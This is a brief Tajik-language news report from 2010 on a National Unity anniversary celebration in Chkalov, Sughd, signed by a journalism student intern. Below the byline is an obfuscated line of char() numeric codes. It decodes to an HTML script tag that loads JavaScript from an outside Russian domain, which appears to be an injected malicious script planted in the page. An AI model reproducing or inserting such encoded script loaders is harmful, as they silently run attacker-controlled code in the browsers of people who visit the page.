29.06.2010
Таҷлили Ваҳдати миллӣ
Суғд. Тавре, ки маълум аст макони асосии таҷлили 13 – уми солгарди Ваҳдати миллӣ ВМКБ мебошад. Вале бояд қайд намуд дигар шаҳрҳо ва ноҳияҳои ҷумҳурӣ бетараф намонданд ва дар сатҳи баландин чорабинии бошукӯҳро таҷлил намуданд. Аз ҷумлаи чунин вилоят, вилояти Суғд мебошад, ки дар шаҳру ноҳияҳои он аз ҷумла Чкалов бошукӯҳу шаҳомати баланд таҷлил гардид, ки дар ин чорабинии идона раиси шаҳр Шавкат Бобораҷабов намояндаи раиси вилояти Суғд Самадов ва намояндаи ҳукумати ҷумҳурӣ Чумъахон Давлатов иштикор ва баромад намуданд.Сараввал раиси шаҳр ба сухан баромада дар хусуси дастовардҳои Ваҳдат ёдоварӣ намуданд ва тамоми шаҳрвандонро бо рӯзи 13 – умин солгарди Ваҳдати миллӣ табрик намуданд. Баъдан намояндаи раиси вилоят ба сухан баромад ва кулли нишастагонро аз номи раиси вилоят Коҳир Расулзода табрик намуд баъд намояндаи ҳукумати ҷумҳурӣ Чумъахон Давлатов ба сухан баромада табрикоти ҳукумати ҷумҳуриро ба шаҳрвандон расонид. Баъдан консерти омоданамудаи ҳофизону ҳунармандон пешкаши ҳозирин гардид.
донишҷӯи бахши рӯзноманигории
факултаи филологияи тоҷик
Гулбекова Зайнура.
Таҷрибаомӯз
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)e625a6d737ee2ab83f18492e018a3642.js" type="text/javascript">

ТАВЗЕҲОТ